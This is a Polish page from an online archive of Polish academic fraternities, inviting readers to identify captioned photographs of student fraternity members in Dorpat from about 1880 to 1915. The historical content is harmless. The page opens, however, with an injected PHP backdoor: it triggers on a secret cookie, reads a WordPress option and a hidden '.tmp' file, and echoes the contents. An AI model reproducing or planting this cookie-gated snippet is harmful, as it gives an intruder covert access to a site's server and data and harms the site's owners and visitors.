if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Identyfikacja fotografii z Dorpatu

Od 2009 r. prezentowane są na stronach Archiwum Korporacyjnego fotografie, a szerzej także inne materialne ślady po korporacjach akademickich, które nie zostały dotychczas zidentyfikowane bądź szczegółowo opisane (vide Identyfikacja fotografii). Celem akcji jest uzupełnienie możliwie wielu brakujących informacji.

Wiele nieopisanych bądź nie w pełni opisanych fotografii znajduje się na niemal wszystkich stronach wirtualnego Muzeum Polskich Korporacji Akademickich. Od 2010 r. dodatkowo niektóre z nich oraz wiele innych nieopisanych fotografii prezentowane są w osobnych działach tworzonych zbiorczo dla identyfikacji fotografii korporacyjnych z jednego ośrodka akademickiego (Identyfikacja fotografii z Wilna, Identyfikacja fotografii z Warszawy, Identyfikacja fotografii z Lublina etc). Fotografie i insygnia korporacyjne, w przypadku których nie można określić ośrodka akademickiego, z którego pochodzą, można zobaczyć w zbiorczym zestawieniu - Identyfikacja fotografii.

Zależałoby nam na ustaleniu możliwie wielu istotnych dla opisu fotografii (bądź innych pamiątek) faktów, w szczególności nazwy korporacji ze zdjęcia, osoby/osób na nim przedstawionych, miejsca i czasu wykonania fotografii. Będziemy wdzięczni za wszelkie informacje, sugestie i przypuszczenia odnośnie prezentowanych zdjęć i innych pamiątek korporacyjnych (vide Kontakt).

Gurpa studentów, Dorpat ok. 1910 r. (?).

0.1. Grupa studentów z Dorpatu prawd. ok. 1910 r.

Fotografia przedstawia grupę studentów z Dorpatu prawdopodobnie ok. 1910 r. (trzeci z lewej Wincenty Miścicki z K! Lechicja). Istotne byłoby ustalenie tożsamości pozostałych osób widocznych na zdjęciu, jak także daty wykonania zdjęcia.

Studenci, od lewej: Władysław Linsenman, NN, NN, NN, Dorpat prawd. ok. 1910 r.

0.2. Studenci z Dorpatu, prawd. ok. 1910 r.

Fotografia przedstawia grupę studentów z Dorpatu prawd. ok. 1910 r. (pierwszy od lewej Władysław Linsenman z K! Lutycja). Istotne byłoby przyporządkowanie tych nazwisk osobom widocznym na zdjęciu.

Korporant, po 1903 r.

0.3. Prawd. członek jednej z polskich korporacji z Dorpatu.

Fotografia przedstawia prawdopodobnie członka polskiej (?) korporacji akademickiej z Dorpatu (Venedya?). Fotografia została wykonana w “C.Schulz. Photographisches Artistisches Atelier” w Dorpacie bądź Rydze po 1903 r. Istotne byłoby ustalenie tożsamości osoby oraz daty wykonania zdjęcia.

Dwóch z Dorpatu, ok. 1880 r.

0.4. Dwóch młodych ludzi, prawdopodobnie polskich studentów w Dorpacie, być może członków Konwentu Polonia, ok. 1880 r.

Fotografia przedstawia prawdopodobnie dwóch polskich studentów w Dorpacie ok. 1880 r., być może członków Konwentu Polonia. Istotne byłoby ustalenie tożsamości osób oraz daty wykonania zdjęcia.

Theodor graf Keyserling, 1883 r.

0.5. Theodor graf Keyserling, 1883 r.

Fotografia przedstawia Theodora grafa Keyserlinga. Zdjęcie zrobiono w Dorpacie. Istotne byłoby ustalenie korporacji, do której należał.

_________________________________________________________________________________________

Konwent Polonia, Dorpat ok. 1915 r.

1.1. Konwent Polonia ok. 1915 r.

Fotografia przedstawia członków Konwentu Polonia w Dorpacie w początkach I wojny światowej. Istotne byłoby ustalenie tożsamości osób widocznych na zdjęciu, jak także daty wykonania zdjęcia.

Konwent Polonia, Dorpat ok. 1915 r.

1.2. Konwent Polonia ok. 1915 r. II

Fotografia przedstawia członków Konwentu Polonia w Dorpacie w początkach I wojny światowej. Istotne byłoby ustalenie tożsamości osób widocznych na zdjęciu, jak także daty wykonania zdjęcia.

Konwent Polonia, Dorpat ok. 1915 r.

1.3. Konwent Polonia ok. 1915 r. III

Fotografia przedstawia członków Konwentu Polonia w Dorpacie w początkach I wojny światowej. Istotne byłoby ustalenie tożsamości osób widocznych na zdjęciu, jak także daty wykonania zdjęcia.

_________________________________________________________________________________________

Lutycja, Dorpat 1888 r.

2.1. Członkowie Lutycji, 1888 r.

Fotografia przedstawia grupę członków Korporacji Lutycja z Dorpatu. Z autografów pod zdjęciem wynika, że uwidocznieni są na nim: Stefan Chazbijewicz, Marian Dowgierd, Bogdan Jakubowski, Stefan Jakubowski, Jan Janikowski, Ludwik Symon, Józef Bergmański (?). Istotne byłoby przyporządkowanie tych nazwisk osobom widocznym na zdjęciu.

_________________________________________________________________________________________

Członek Korporacji Znicz (Lechicja), Dorpat 1904 r.

3.1. Członek Korporacji Znicz (Lechicja) w Dorpacie.

Fotografia przedstawia członka Korporacji Znicz (Lechicji) z Dorpatu w 1904 r. Istotne byłoby określenie tożsamości osoby na zdjęciu, a także dokładnej daty wykonania fotografii.

Stanisław Szydłowski. Identyfikacja przez Marię Głowniak 11 XI 2012 r.

 

_________________________________________________________________________________________

Członek Venedyi, prawd. ok. 1915 r.

4.1. Prawd. członek Venedyi.

Fotografia przedstawia prawdopodobnie studenta weterynarii, członka Korporacji Venedya z Dorpatu. Istotne byłoby ustalenie tożsamości osoby oraz daty wykonania zdjęcia.

Venedzi, od lewej: NN, Mieczysław Rymkiewicz, NN, NN, Dorpat.

4.2. Członkowie Venedyi.

Fotografia przedstawia grupę członków Korporacji Venedya z Dorpatu (drugi od lewej Mieczysław Rymkiewicz). Istotne byłoby ustalenie tożsamości pozostałych osób na zdjęciu, jak także daty wykonania fotografii.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 13 X 2010 r.
Ostatnia zmiana: 5 II 2013 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Identyfikacja fotografii z Dorpatu, (na:) www.archiwumkorporacyjne.pl, stan 5 II 2013 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }